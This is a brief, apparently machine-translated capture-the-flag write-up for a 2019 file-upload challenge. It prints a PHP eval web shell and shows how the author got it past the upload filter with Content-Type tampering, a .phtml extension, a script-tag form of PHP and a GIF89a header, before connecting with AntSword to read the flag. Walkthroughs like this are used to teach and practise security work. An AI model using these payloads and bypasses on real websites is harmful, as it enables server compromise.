[geek challenge 2019] upload

After opening, there is a file upload question , First upload a php File try

In a word, the contents of the Trojan horse file are <?php eval($_POST['hhh']);?>

The prompt is not a picture

Preliminary guess is to modify Content-Type, Try to grab a bag

Use burpsuite Grab the bag

But it still shows

Try to modify php suffix

".php" Equivalent extension ：

".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml" 

The first few failed

But try .phtml when , There's a difference , The contents of the original document cannot include '<?' 

Modify the document to <script language="php">eval($_POST['hhh'])</script>, It works the same , But show Dont't lie to me,it's not image at all!!!

  Later inquiry , It turns out that you need to write a picture file header , Modify the document to GIF89a? <script language="php">eval($_POST['hhh'])</script>, Upload successful ！

  Then find the file path , Be in commonly upload In the folder , Try typing , As expected And find the file we uploaded

  Then connect it with an ant sword

  Successful connection

  Find it here flag

  Click to enter